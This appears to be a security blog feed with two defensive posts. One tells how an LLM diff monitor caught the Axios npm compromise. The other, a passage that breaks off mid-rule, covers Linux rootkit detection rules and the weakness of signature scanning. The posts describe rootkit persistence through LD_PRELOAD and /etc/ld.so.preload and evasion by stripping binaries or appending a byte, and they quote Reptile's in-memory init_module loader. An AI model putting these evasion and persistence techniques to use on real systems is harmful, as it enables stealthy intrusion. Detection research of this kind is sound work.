<p>Last Monday night I was working late when a Slack alert came in from a monitoring tool I had built three days earlier. Axios, one of the most popular npm packages in the world, compromised.</p>
<p>My heart started racing; I knew every second mattered to respond and limit the damage. But honestly, it was so crazy that I thought it must be a false positive. I checked and rechecked everything a few times, even though it seemed very obviously malicious.</p>
<p>It wasn't a false positive. It was one of the largest supply chain compromises ever on npm, with presumed attribution to DPRK state actors. We caught it with a proof of concept I hacked together on a Friday afternoon, running on my laptop, powered by AI reading diffs.</p>
<p>I want to share the whole story. How we got here, what I built, and why I think sharing it openly makes everyone a little safer.</p>
<h2>I've been worried about supply chain for a while</h2>
<p>Some recent supply chain incidents have genuinely had me up at night. Supply chain compromise is a hard problem. At Elastic we have so many developers, and our security customers are trusting us to protect them. It has been clear that the status quo is broken, and we need some new technology or procedures to help. I had some ideas around a more trusted, AI-vetted ecosystem, building on app control principles while limiting cost and friction.</p>
<p>But the <a href="https://www.theregister.com/2026/03/30/telnyx_pypi_supply_chain_attack_litellm/">Trivy compromise</a> was really where I took notice. On March 19th, a group called TeamPCP compromised the <a href="https://github.com/aquasecurity/trivy-action">aquasecurity/trivy-action</a> GitHub Action (the one for the popular Trivy security scanner, yes, a security tool). They injected a credential stealer that harvested secrets from CI/CD pipelines. A massive amount of credentials were stolen.</p>
<p>That cascaded fast. On March 24th, <a href="https://docs.litellm.ai/blog/security-update-march-2026">LiteLLM got hit</a>. TeamPCP had stolen LiteLLM's PyPI publishing credentials through the poisoned Trivy pipeline, and used them to push malicious versions that were aggressive credential stealers. SSH keys, cloud creds, API keys, wallet data, everything.</p>
<p>LiteLLM is a package I had used myself. So you could say at that point I was fully &quot;up at night.&quot;</p>
<p>I knew that with all the credentials leaked from the Trivy breach, there was definitely going to be more. We needed to do something to stay ahead of it. Both for our customers and to protect Elastic.</p>
<h2>Friday, after the red-eye</h2>
<p>I had just flown back from <a href="https://www.rsaconference.com/">RSAC 2026</a> in San Francisco. Red-eye flight Thursday night. If you've done a red-eye after four days of conference, you know the state I was in. However, I was excited as ever for a new project, so I sat down and hammered out v0.0.1.</p>
<p>The idea: monitor changes as they get pushed to package repos. Run a diff to see what changed. Use AI/LLM to determine if the changes are malicious. That's basically it.</p>
<p>The pipeline looks like:</p>
<ol>
<li>Poll PyPI's changelog API and npm's CouchDB <code>_changes</code> feed for new releases</li>
<li>Filter against a watchlist of the top 15,000 packages by download count</li>
<li>Download the old and new versions directly from the registry (no pip install, no npm install, no code execution)</li>
<li>Diff them into a markdown report</li>
<li>Send the diff to an LLM: &quot;is this malicious?&quot;</li>
<li>If yes, alert to Slack</li>
</ol>
<p>I wanted to focus mainly on top packages since that's most likely where attackers would go anyway, and it would be much less costly in terms of tokens and compute. It was completely manageable to run on my laptop.</p>
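<p>In code, the loop is barely more than its own description. Here is a minimal sketch with every stage stubbed out; the function names and watchlist are illustrative placeholders, not the real tool's:</p>

```python
# Placeholder watchlist; the real tool tracks the top 15,000 packages.
WATCHLIST = {'axios', 'requests', 'lodash'}

def poll_new_releases():
    # Stub: poll PyPI's changelog API and npm's CouchDB _changes feed.
    return []  # list of (package, old_version, new_version) tuples

def download_and_diff(package, old, new):
    # Stub: fetch both archives straight from the registry (no install,
    # no code execution) and render a diff report.
    return f'--- {package} {old}\n+++ {package} {new}\n'

def llm_verdict(diff_report):
    # Stub: ask the model 'is this malicious?' and parse its answer.
    return 'benign'

def alert_slack(package, version):
    print(f'ALERT: {package} {version} flagged as malicious')

def run_once():
    # One polling cycle; the real loop repeats this on an interval.
    alerts = []
    for package, old, new in poll_new_releases():
        if package not in WATCHLIST:
            continue  # top packages only: cheaper, and where attackers go
        report = download_and_diff(package, old, new)
        if llm_verdict(report) == 'malicious':
            alert_slack(package, new)
            alerts.append((package, new))
    return alerts
```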
<h2>Why Cursor</h2>
<p>There are a lot of agent harnesses out there. I've written my own for projects like AI malware reverse engineering. But I was very short on time, so I chose to harness up <a href="https://cursor.com/docs/cli/overview">Cursor</a> since it's one of my main dev tools. The Agent CLI lets you invoke it programmatically: pass a workspace, an instruction, and a model. I run it in <code>ask</code> mode (read-only) so it can only read the diff, never modify anything. The whole analysis step is a single subprocess call.</p>
<p>The prompt is simple. I tell it what to look for (obfuscated code, base64, exec/eval, unexpected network calls, steganography, persistence mechanisms, lifecycle script abuse) and ask it to respond with <code>Verdict: malicious</code> or <code>Verdict: benign</code>. Parse the verdict, act on it.</p>
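<p>That step can be sketched as below. The CLI name and flags here are my shorthand, not an exact invocation; check the Agent CLI docs for the current interface:</p>

```python
import subprocess

PROMPT = (
    'Review report.md, a diff of a package release, for supply chain '
    'compromise indicators: obfuscated code, base64 blobs, exec/eval, '
    'unexpected network calls, steganography, persistence mechanisms, '
    'and lifecycle script abuse. End your reply with exactly '
    '"Verdict: malicious" or "Verdict: benign".'
)

def parse_verdict(output):
    # Pull the final verdict line out of the agent's free-form reply.
    for line in reversed(output.splitlines()):
        if line.strip().lower().startswith('verdict:'):
            return line.split(':', 1)[1].strip().lower()
    return 'unknown'  # fail open to manual review

def analyze(workspace):
    # Flag names are a sketch; the real invocation may differ.
    result = subprocess.run(
        ['cursor-agent', '--print', PROMPT],
        cwd=workspace, capture_output=True, text=True, timeout=600,
    )
    return parse_verdict(result.stdout)
```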
<h2>On model selection</h2>
<p>I normally use Opus 4.6 or GPT 5.4 for most things. Opus especially for cybersecurity-focused tasks. But I wanted to keep costs down for something that needs to analyze dozens of releases per hour.</p>
<p>There have been some really good blog posts from the Cursor team lately, one on <a href="https://cursor.com/blog/fast-regex-search">fast regex search for agent tools</a> and another on their <a href="https://cursor.com/blog/real-time-rl-for-composer">real-time RL approach</a> where they use actual production inference tokens as training signals and deploy improved checkpoints roughly every five hours. Genuinely impressive engineering.</p>
<p>So I wanted to give Composer 2 a shot. I used fast mode, which is truly fast. Perfect for a real-time use case. Low cost, fast, and effective (in my testing).</p>
<h2>Testing on Telnyx</h2>
<p>You have to test these things to know they'll actually work. Usually that means tweaking prompts a bunch.</p>
<p>I got lucky (or unlucky) with timing. On the same Friday I was building this, the <a href="https://telnyx.com/resources/telnyx-python-sdk-supply-chain-security-notice-march-2026">telnyx PyPI package got compromised</a> by TeamPCP. They injected 74 lines of malicious code into <code>_client.py</code>: payloads hidden inside WAV audio files (steganography), base64 obfuscation, a Windows persistence implant disguised as <code>msbuild.exe</code>, and exfiltration to a hardcoded C2.</p>
<p>I used the diff between the legitimate and malicious <code>telnyx</code> package to build out the initial prompt. The model was very good at identifying malicious changes like this. I also wanted to know immediately when a compromise was detected, so I added Slack alerting.</p>
<h2>Monday night</h2>
<p>I let it run over the weekend. It churned through releases, everything coming back benign.</p>
<p>I never got a single false positive, which is honestly strange if you've ever done detection work in cybersecurity. We're usually drowning in FPs. I had intentionally instructed the LLM to alert only on &quot;high confidence&quot; supply chain compromises, since LLMs are generally trigger-happy out of the box. It still caught the Telnyx test case, with no FPs. That could be overfitting given such a low sample size, but there was no time to build something more robust.</p>
<p>Then Monday night, working late, the Slack alert came in.</p>
<pre><code>🚨 Supply Chain Alert: axios 0.30.4
Verdict: MALICIOUS
npm: https://www.npmjs.com/package/axios/v/0.30.4
</code></pre>
<p>Did it really just find one of the biggest supply chain compromises in recent memory?</p>
<p>I checked the analysis. Rechecked it. Checked it again. The attackers had compromised a maintainer's npm account, changed the email to a ProtonMail account they controlled, and published two malicious versions (1.14.1 and 0.30.4). They didn't inject code directly into Axios. Instead they added a phantom dependency called <code>plain-crypto-js</code> that ran a postinstall hook deploying cross-platform malware. It was obviously malicious.</p>
<h2>The response</h2>
<p>I reached out immediately to our infosec team and research team at Elastic to get them spun up. I knew every second mattered. It turns out that when I contacted them, they had already received Elastic Defend alerts on a host that had installed the malicious package and were actively responding. But at that point nobody had realized the extent of the issue or had a root cause understanding of how the machine became infected. The monitoring tool provided that missing context.</p>
<p>I tried sending an email to <code>security@npmjs</code> and got a bounce back. Tried submitting to their security portal and got an error. I tweeted out in desperation to get a hold of a human. I also quickly opened a security issue on the axios repo itself.</p>
<p>Later, I saw a tweet from another researcher who had observed the compromise, and I realized I was handling this more as a vulnerability than a supply chain incident. With a vulnerability you coordinate quietly. With an active compromise that is installing malware on people's machines right now, going wide and open is the right call. So I immediately shared all the details I had compiled to X.</p>
<p>We even started getting alerts from our telemetry showing impacted orgs in the wild. The thing was actively running.</p>
<p>Fortunately, the Axios team jumped on it and pulled the packages pretty quickly. Also, the attacker's C2 server was getting so many requests that it was falling over. It could have been a lot worse.</p>
<p>Our team at Elastic Security Labs published full technical write-ups on the compromise. The first covers the end-to-end attack chain, the cross-platform malware, and the C2 protocol: <a href="https://www.elastic.co/security-labs/axios-one-rat-to-rule-them-all">Inside the Axios supply chain compromise - one RAT to rule them all</a>. The second covers hunting and detection rules across Linux, Windows, and macOS: <a href="https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections">Elastic releases detections for the Axios supply chain compromise</a>.</p>
<h2>Where we go from here</h2>
<p>The state of things right now is not great and we need to do better as a whole software ecosystem, let alone the security industry.</p>
<p>In two weeks in March:</p>
<ul>
<li>Trivy (a security scanner) was compromised to steal CI/CD secrets</li>
<li>LiteLLM was compromised using those stolen secrets</li>
<li>Telnyx was compromised in the same campaign</li>
<li>Axios, one of the most depended-upon packages in npm, was compromised by a suspected DPRK actor</li>
<li>and more</li>
</ul>
<p>Package registries are critical infrastructure. The teams running PyPI and npm are doing great work, but the threat has moved past what current trust models can handle. We need better automated monitoring of package changes. Not just signature scanning but actually understanding what code does. LLMs are genuinely good at this, as this project shows. And we need credential rotation after breaches to happen faster. The Trivy to LiteLLM to Telnyx cascade happened because stolen creds weren't rotated quickly enough.</p>
<p>One practical thing you can do right now: don't pull in package updates immediately. Add a soak time. Let new versions sit for a period before your builds pick them up. We do this with our CI/CD systems at Elastic in <a href="https://www.elastic.co/blog/shai-hulud-worm-2-0-updated-response">response</a> to shai-hulud. It won't stop everything, but it gives the community time to catch compromises before they hit your CI/CD pipelines and developer machines. The good news is that many package managers have added native support for this. For example, to enforce a 7-day delay:</p>
<pre><code>npm config set min-release-age 7
pnpm config set minimum-release-age 10080
yarn config set npmMinimumReleaseAge 10080
uv --exclude-newer &quot;7 days ago&quot;
</code></pre>
<h2>We're open sourcing this</h2>
<p>We're releasing the tool: <a href="https://github.com/elastic/supply-chain-monitor"><strong>supply-chain-monitor</strong></a></p>
<p>I want to be upfront. It's a proof of concept. I built it in an afternoon on no sleep. I don't expect anyone to run it at a production level. It requires a Cursor subscription for the LLM analysis, it processes releases sequentially, and the watchlists are static.</p>
<p>But the approach works. Diffing package releases in real-time and using AI to classify the changes caught a supply chain attack on one of the most popular packages in npm.</p>
<p>I'm sharing this because it's best for the community to learn from our experiences. If someone takes this idea and builds something better, great. If a package registry team builds it into their pipeline, even better. If it means someone else has a big save next time, this was worth it.</p>
<h2>How it works (for the curious)</h2>
<p><strong>Monitoring:</strong> Two threads poll PyPI (via <code>changelog_since_serial()</code> XML-RPC) and npm (via CouchDB <code>_changes</code> feed). New releases matching the top-N watchlist get queued. State persists to <code>last_serial.yaml</code> so it picks up where it left off.</p>
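<p>The PyPI side of that polling can be sketched with the standard library alone. <code>changelog_since_serial</code> is PyPI's XML-RPC changelog method; the action-string filtering below is a simplification of what the real tool does:</p>

```python
import xmlrpc.client

PYPI_XMLRPC = 'https://pypi.org/pypi'

def filter_releases(entries, watchlist):
    # Keep watchlisted 'new release' events from a changelog batch.
    # Each entry is (name, version, timestamp, action, serial).
    hits = []
    for name, version, _ts, action, serial in entries:
        if name in watchlist and action == 'new release' and version:
            hits.append((name, version, serial))
    return hits

def poll_pypi(last_serial, watchlist):
    # One poll cycle; persist the highest serial seen to resume later.
    client = xmlrpc.client.ServerProxy(PYPI_XMLRPC)
    entries = client.changelog_since_serial(last_serial)
    return filter_releases(entries, watchlist)
```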
<p><strong>Diffing:</strong> Old and new versions downloaded directly from registry APIs. No pip/npm install, no code execution. Archives extracted, files hashed, unified diff report generated in markdown.</p>
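<p>The diff step needs nothing exotic. Assuming both archives have already been extracted into path-to-text mappings (a simplification of the real report generation), Python's <code>difflib</code> does the rest:</p>

```python
import difflib

def diff_versions(old_files, new_files):
    # Render a report of every added, removed, or changed file.
    # Inputs map relative paths to file text for each extracted archive.
    sections = []
    for path in sorted(set(old_files) | set(new_files)):
        old = old_files.get(path, '').splitlines(keepends=True)
        new = new_files.get(path, '').splitlines(keepends=True)
        if old == new:
            continue  # unchanged files add nothing but tokens
        body = ''.join(difflib.unified_diff(
            old, new, fromfile=f'a/{path}', tofile=f'b/{path}'))
        sections.append(f'### {path}\n{body}')
    return '\n\n'.join(sections)
```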
<p><strong>Analysis:</strong> Diff report goes to Cursor Agent CLI in read-only mode. Prompt asks it to look for supply chain indicators. Output parsed for the verdict.</p>
<p><strong>Alerting:</strong> Malicious verdict fires a Slack message with the package name, rank, registry link, and analysis summary.</p>
<h2>AI in security, beyond this project</h2>
<p>Supply chain security is a big issue, but we aren’t powerless. AI gives us new tools to defend at scale at machine speed. This project is one example of using AI to help with a security problem, but we've been doing a lot of interesting work with AI across Elastic Security more broadly. One thing I'd highlight: our team recently published a post on <a href="https://www.elastic.co/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">using Attack Discovery, Workflows, and Agent Builder to automatically detect and confirm APT-level attacks</a>. This shows the power of the Elastic Platform, delivering agentic security to meaningfully improve the efficiency and efficacy of your SOC in a time when we are collectively drowning in attacks.</p>
<hr />
<p><em>The supply-chain-monitor project is available at <a href="https://github.com/elastic/supply-chain-monitor">github.com/elastic/supply-chain-monitor</a>.</em></p>
<p><em>Thanks to the Elastic Infosec team for the rapid incident response, the axios maintainers for the quick takedown, and the security community for the collective effort that limited the blast radius.</em></p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/how-we-caught-the-axios-supply-chain-attack/how-we-caught-the-axios-supply-chain-attack.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Hooked on Linux: Rootkit Detection Engineering]]></title>
            <link>https://www.elastic.co/security-labs/linux-rootkits-2-caught-in-the-act</link>
            <guid>linux-rootkits-2-caught-in-the-act</guid>
            <pubDate>Thu, 02 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[In this second part of a two-part series, we explore Linux rootkit detection engineering, focusing on the limitations of static detection reliance, and the importance of rootkit behavioral detection.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>In <a href="https://www.elastic.co/security-labs/linux-rootkits-1-hooked-on-linux">part one</a>, we examined how Linux rootkits work: their evolution, taxonomy, and techniques for manipulating user space and kernel space. In this second part, we turn to detection engineering. We begin by showing why static detection is often unreliable against Linux rootkits, even when binaries are only trivially modified, and then move on to behavioral and runtime signals that defenders can use instead. From shared object abuse and LKM loading to eBPF, io_uring, persistence, and defense evasion, this article focuses on practical ways to detect and investigate rootkit activity in real environments.</p>
<h2>Static detection via VirusTotal</h2>
<p>Before focusing on behavioral detection techniques, it is useful to examine how well traditional static detection mechanisms identify Linux rootkits. To do so, we conducted a small experiment using VirusTotal as a proxy for traditional signature-based antivirus detection. A dataset of ten Linux rootkits was assembled from publicly available research papers and open-source repositories. Each sample was either uploaded to VirusTotal or retrieved from existing submissions.</p>
<p>For every rootkit, we recorded the number of antivirus engines that flagged the original binary. We then performed two additional tests:</p>
<ol>
<li>Stripped binaries, created using <code>strip --strip-all</code>, removing symbol tables and other non-essential metadata.</li>
<li>Trivially modified binaries, created by appending a single null byte to the original file: an intentionally unsophisticated change.</li>
</ol>
<p>The goal was not to evade detection through advanced obfuscation, but to assess how fragile static signatures are when faced with even the simplest binary modifications.</p>
<p><em>Table 1: Technical overview of the analyzed rootkit dataset</em></p>
<table>
<thead>
<tr>
<th align="left">Rootkit</th>
<th align="left">Basic detections</th>
<th align="left">Stripped</th>
<th align="left">Null byte added</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Azazel</td>
<td align="left">36/66</td>
<td align="left">19/66</td>
<td align="left">21/66</td>
</tr>
<tr>
<td align="left">Bedevil*</td>
<td align="left">32/66</td>
<td align="left">32/66</td>
<td align="left">21/66</td>
</tr>
<tr>
<td align="left">BrokePKG</td>
<td align="left">7/66</td>
<td align="left">3/66</td>
<td align="left">3/66</td>
</tr>
<tr>
<td align="left">Diamorphine</td>
<td align="left">33/66</td>
<td align="left">8/64</td>
<td align="left">22/66</td>
</tr>
<tr>
<td align="left">Kovid</td>
<td align="left">27/66</td>
<td align="left">1/66</td>
<td align="left">15/66</td>
</tr>
<tr>
<td align="left">Mobkit</td>
<td align="left">29/66</td>
<td align="left">6/66</td>
<td align="left">17/66</td>
</tr>
<tr>
<td align="left">Reptile</td>
<td align="left">32/66</td>
<td align="left">3/66</td>
<td align="left">20/66</td>
</tr>
<tr>
<td align="left">Snapekit</td>
<td align="left">30/66</td>
<td align="left">3/66</td>
<td align="left">19/66</td>
</tr>
<tr>
<td align="left">Symbiote</td>
<td align="left">42/66</td>
<td align="left">8/66</td>
<td align="left">22/66</td>
</tr>
<tr>
<td align="left">TripleCross</td>
<td align="left">31/66</td>
<td align="left">17/66</td>
<td align="left">19/66</td>
</tr>
</tbody>
</table>
<p><em>* Bedevil is stripped by default, and thus, the basic and stripped detections are the same</em></p>
<h3>Observations</h3>
<p>As expected, stripping binaries generally resulted in a sharp drop in detection rates. In several cases, detections fell to near-zero, suggesting that some antivirus engines rely heavily on symbol information or other easily removable metadata. Even more telling is the impact of adding a single null byte: a modification that does not alter program logic, execution flow, or behavior, yet still significantly degrades detection for many samples.</p>
<p>This highlights a fundamental weakness of static, signature-based detection. If a one-byte change can meaningfully affect detection outcomes, attackers do not need sophisticated obfuscation to evade static scanners.</p>
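<p>For hash-based indicators in particular, the fragility is mechanical: appending a single null byte produces a completely different digest, so any IOC keyed on the original file hash simply stops matching. A small illustration (the bytes here are placeholders, not a real sample):</p>

```python
import hashlib

def sha256(data):
    return hashlib.sha256(data).hexdigest()

original = b'\x7fELF' + b'illustrative rootkit bytes'
modified = original + b'\x00'  # the one-byte change from the experiment

# Program logic is untouched, yet every hash-based indicator now misses.
assert sha256(original) != sha256(modified)
```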
<h3>Obfuscation techniques in rootkits</h3>
<p>Interestingly, most of the rootkits in this dataset employ little to no advanced static obfuscation. Where obfuscation is present, it is typically limited to simple XOR encoding of strings or configuration data, or lightweight packing techniques that slightly alter the binary layout. These methods are inexpensive to implement and sufficient to defeat many static signatures.</p>
<p>The absence of more advanced obfuscation in these samples is notable. Many are open-source proof-of-concept rootkits designed to demonstrate techniques rather than to aggressively evade detection. Yet even with minimal or no obfuscation, static detection proves unreliable.</p>
<h3>Why static detection is not enough</h3>
<p>This experiment reinforces a key point: static detection alone is fundamentally insufficient for reliable rootkit detection. The fragility of static signatures (especially in the face of trivial modifications) means defenders cannot rely on file-based indicators or hash-based detection to uncover stealthy threats.</p>
<p>When binaries can be altered without affecting behavior, the only remaining consistent signal is the rootkit's behavior at runtime. For that reason, the remainder of this blog shifts its focus from static artifacts to dynamic analysis and behavioral detection, examining how rootkits interact with the operating system, manipulate execution flow, and leave observable traces during execution.</p>
<p>That is where detection engineering becomes both more challenging and far more effective.</p>
<h2>Dynamic detection engineering</h2>
<h3>Userland rootkit loading detection techniques</h3>
<p>Userland rootkits often hijack the dynamic linking process, injecting malicious shared objects into target processes without needing kernel-level access. An infection begins with the creation of a shared object file. Newly created shared object files can be detected with a rule similar to the one shown below:</p>
<pre><code class="language-sql">file where event.action == &quot;creation&quot; and
(file.extension like~ &quot;so&quot; or file.name like~ &quot;*.so.*&quot;)
</code></pre>
<p>These files are often written to writable or ephemeral paths such as <code>/tmp/</code>, <code>/dev/shm/</code>, or hidden subdirectories under user home directories. Attackers may download them, compile them locally, or drop them directly from a loader. This knowledge may be applied to the detection rule above to reduce noise.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image7.png" alt="Figure 1: Telemetry example of a shared object rootkit file creation" title="Figure 1: Telemetry example of a shared object rootkit file creation." /></p>
<p>As an example, in the telemetry shown above, we can see the threat actor using <code>scp</code> to download a shared object file into a hidden subdirectory within <code>/tmp</code>, then move it to a library directory, attempting to blend in. We detected this, and similar threats, via:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/persistence_shared_object_creation.toml">Shared Object Created by Previously Unknown Process</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/linux/defense_evasion_hidden_shared_object.toml">Creation of Hidden Shared Object File</a></li>
</ul>
<p>Once the shared object file is present on the system, the attacker has several options for activating it. The most commonly abused mechanisms are the <code>LD_PRELOAD</code> environment variable, the <code>/etc/ld.so.preload</code> file, and dynamic linker configuration paths such as <code>/etc/ld.so.conf</code>.</p>
<p>The <code>LD_PRELOAD</code> environment variable allows an attacker to specify a shared object that will be loaded before any other libraries during the execution of a dynamically linked binary. This allows for a complete override of <code>libc</code> functions, such as <code>execve()</code>, <code>open()</code>, or <code>readdir()</code>. This method works on a per-process basis and does not require root access.</p>
<p>To detect this technique, telemetry for the <code>LD_PRELOAD</code> environment variable is required. Once this is available, detection logic flagging uncommon <code>LD_PRELOAD</code> values can be written. For example:</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
process.env_vars != null
</code></pre>
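<p>Where endpoint environment-variable telemetry is unavailable, a point-in-time sweep of <code>/proc/&lt;pid&gt;/environ</code> can surface processes already running with a preload set. A minimal Linux-only sketch (no substitute for continuous telemetry, since short-lived processes are missed):</p>

```python
import os

def preload_entries(environ_blob):
    # /proc/PID/environ is NUL-delimited; pull out any LD_PRELOAD value.
    hits = []
    for entry in environ_blob.split(b'\x00'):
        if entry.startswith(b'LD_PRELOAD='):
            hits.append(entry.split(b'=', 1)[1].decode(errors='replace'))
    return hits

def scan_processes():
    # Report live processes running with LD_PRELOAD set (Linux only).
    findings = {}
    for pid in filter(str.isdigit, os.listdir('/proc')):
        try:
            with open('/proc/' + pid + '/environ', 'rb') as f:
                values = preload_entries(f.read())
        except OSError:
            continue  # process exited or access denied
        if values:
            findings[int(pid)] = values
    return findings
```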
<p>As shown in Figure 1, this was also the next step for the attackers: they moved <code>libz.so.1</code> from <code>/tmp/.X12-unix/libz.so.1</code> to <code>/usr/local/lib/libz.so.1</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image18.png" alt="Figure 2: Telemetry example of a shared object rootkit load via LD_PRELOAD" title="Figure 2: Telemetry example of a shared object rootkit load via LD_PRELOAD." /></p>
<p>To be higher fidelity, we implemented this logic using the <a href="https://www.elastic.co/docs/solutions/security/detect-and-alert/create-detection-rule#create-new-terms-rule">new_terms rule type</a>, only flagging on previously unseen shared object entries within the <code>LD_PRELOAD</code> variable via:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/defense_evasion_unusual_preload_env_vars.toml#L18">Unusual Preload Environment Variable Process Execution</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/3e9b8bcdc7c1e70705aa33d3981bae224289a549/rules/linux/defense_evasion_ld_preload_cmdline.toml">Unusual LD_PRELOAD/LD_LIBRARY_PATH Command Line Arguments</a></li>
</ul>
<p>Of course, if more than just <code>LD_PRELOAD</code> and <code>LD_LIBRARY_PATH</code> environment variables are collected, the rule above should be altered to include these two items specifically. To reduce noise, statistical analysis and/or baselining should be conducted.</p>
<p>Another method of activation is to leverage the <code>/etc/ld.so.preload</code> file. If present, this file forces the dynamic linker to inject the listed shared object into every dynamically linked binary on the system, resulting in global injection.</p>
<p>A similar method involves altering the dynamic linker’s configuration to prioritize malicious library paths. This can be achieved by modifying <code>/etc/ld.so.conf</code> or adding entries to <code>/etc/ld.so.conf.d/</code>, followed by executing <code>ldconfig</code> to update the cache. This changes the resolution path of critical libraries, such as <code>libc.so.6</code>.</p>
<p>These scenarios can be detected by monitoring the <code>/etc/ld.so.preload</code> and <code>/etc/ld.so.conf</code> files, as well as the <code>/etc/ld.so.conf.d/</code> directory for creation/modification events. Using this raw telemetry, a detection rule to flag these events can be implemented:</p>
<pre><code class="language-sql">file where event.action in (&quot;creation&quot;, &quot;rename&quot;) and
file.path like (&quot;/etc/ld.so.preload&quot;, &quot;/etc/ld.so.conf&quot;, &quot;/etc/ld.so.conf.d/*&quot;)
</code></pre>
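<p>Complementing event-based monitoring of these paths, the same linker configuration can be audited on demand and baselined across scans. A simple sketch:</p>

```python
import glob

def read_entries(path):
    # Return non-comment, non-empty lines from a linker config file.
    try:
        with open(path) as f:
            return [line.strip() for line in f
                    if line.strip() and not line.strip().startswith('#')]
    except OSError:
        return []  # file absent or unreadable

def audit_linker_config():
    # Snapshot every path the dynamic linker is told to trust, so the
    # output can be diffed against a known-good baseline over time.
    findings = {}
    paths = ['/etc/ld.so.preload', '/etc/ld.so.conf']
    paths += sorted(glob.glob('/etc/ld.so.conf.d/*'))
    for path in paths:
        entries = read_entries(path)
        if entries:
            findings[path] = entries
    return findings
```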
<p>We frequently see this chain, where a shared object is created, and then the dynamic linker is modified.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image9.png" alt="Figure 3: Telemetry example of shared object creation followed by dynamic linker configuration creation" title="Figure 3: Telemetry example of shared object creation followed by dynamic linker configuration creation." /></p>
<p>Which we detect via the following detection rules:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/defense_evasion_dynamic_linker_file_creation.toml">Dynamic Linker Creation</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml">Modification of Dynamic Linker Preload Shared Object</a></li>
</ul>
<p>Seeing these two alerts fire in sequence on a single host warrants investigation.</p>
<h3>Kernel-space rootkit loading detection techniques</h3>
<p>Loading an LKM manually typically requires built-in command-line utilities such as <code>modprobe</code>, <code>insmod</code>, and <code>kmod</code>. Monitoring the execution of these utilities therefore covers the loading phase (when it is performed manually).</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and (
  (process.name == &quot;kmod&quot; and process.args == &quot;insmod&quot; and
   process.args like~ &quot;*.ko*&quot;) or
  (process.name == &quot;kmod&quot; and process.args == &quot;modprobe&quot; and
   not process.args in (&quot;-r&quot;, &quot;--remove&quot;)) or
  (process.name == &quot;insmod&quot; and process.args like~ &quot;*.ko*&quot;) or
  (process.name == &quot;modprobe&quot; and not process.args in (&quot;-r&quot;, &quot;--remove&quot;))
)
</code></pre>
<p>Many open-source rootkits are published without a loader and rely on pre-installed LKM-loading utilities. An example is <a href="https://github.com/MatheuZSecurity/Singularity">Singularity</a>, which ships a <code>load_and_persistence.sh</code> script that performs several setup actions and eventually calls <code>insmod &quot;$MODULE_DIR/$MODULE_NAME.ko&quot;</code>. Although <code>insmod</code> is invoked in the command, it is actually <code>kmod</code> under the hood, with <code>insmod</code> passed as a process argument. An example of a Singularity load:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image15.png" alt="Figure 4: Telemetry example of loading singularity.ko via kmod" title="Figure 4: Telemetry example of loading singularity.ko via kmod." /></p>
<p>Which can be easily detected via the following detection rules:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/linux/persistence_insmod_kernel_module_load.toml">Kernel Module Load via Built-in Utility</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/5d5e1d9ca43c1344927a0e81302bc14cb1891a20/rules/linux/persistence_kernel_module_load_from_unusual_location.toml">Kernel Module Load from Unusual Location</a></li>
</ul>
<p>This detection approach, however, is far from bulletproof, as many rootkits rely on a loader to load the LKM, thereby bypassing execution of these userland utilities.</p>
<p>For example, <a href="https://codeberg.org/hardenedvault/Reptile-vault-range/src/commit/01dc5e1300bf1ba364870c8f4781e085c3c463e9/kernel/loader/loader.c">Reptile’s loader</a> directly invokes the <code>init_module</code> syscall with an in-memory decrypted kernel blob:</p>
<pre><code class="language-c">#define init_module(module_image, len, param_values) syscall(__NR_init_module, module_image, len, param_values)

int main(void) {
    [...]
    do_decrypt(reptile_blob, len, DECRYPT_KEY);
    module_image = malloc(len);
    memcpy(module_image, reptile_blob, len);
    init_module(module_image, len, &quot;&quot;);
    [...]
}
</code></pre>
<p>Additionally, <a href="https://codeberg.org/hardenedvault/Reptile-vault-range/src/commit/01dc5e1300bf1ba364870c8f4781e085c3c463e9/kernel/kmatryoshka/kmatryoshka.c">Reptile’s kmatryoshka module</a> acts as an in-kernel chainloader that decrypts and loads another hidden LKM using a direct function pointer to <code>sys_init_module</code>, located via <code>kallsyms_on_each_symbol()</code>. This further obscures the loading mechanism from userland visibility.</p>
<p>Because of this, it's essential to understand what these utilities do under the hood; they are merely wrappers around the <code>init_module()</code> and <code>finit_module()</code> system calls. Effective detection should therefore focus on tracing these syscalls directly, rather than the tooling that invokes them.</p>
<p>To ensure the availability of the data sources required to observe LKM loading, various security tools can be employed. Auditd or Auditd Manager are suitable choices. To facilitate the collection of the <code>init_module()</code> and <code>finit_module()</code> syscalls, the following configuration can be implemented.</p>
<pre><code class="language-shell">-a always,exit -F arch=b64 -S finit_module -S init_module
-a always,exit -F arch=b32 -S finit_module -S init_module
</code></pre>
<p>Combining this raw telemetry with a detection rule that alerts when this event occurs allows for a strong defense.</p>
<pre><code class="language-sql">driver where event.action == &quot;loaded-kernel-module&quot; and
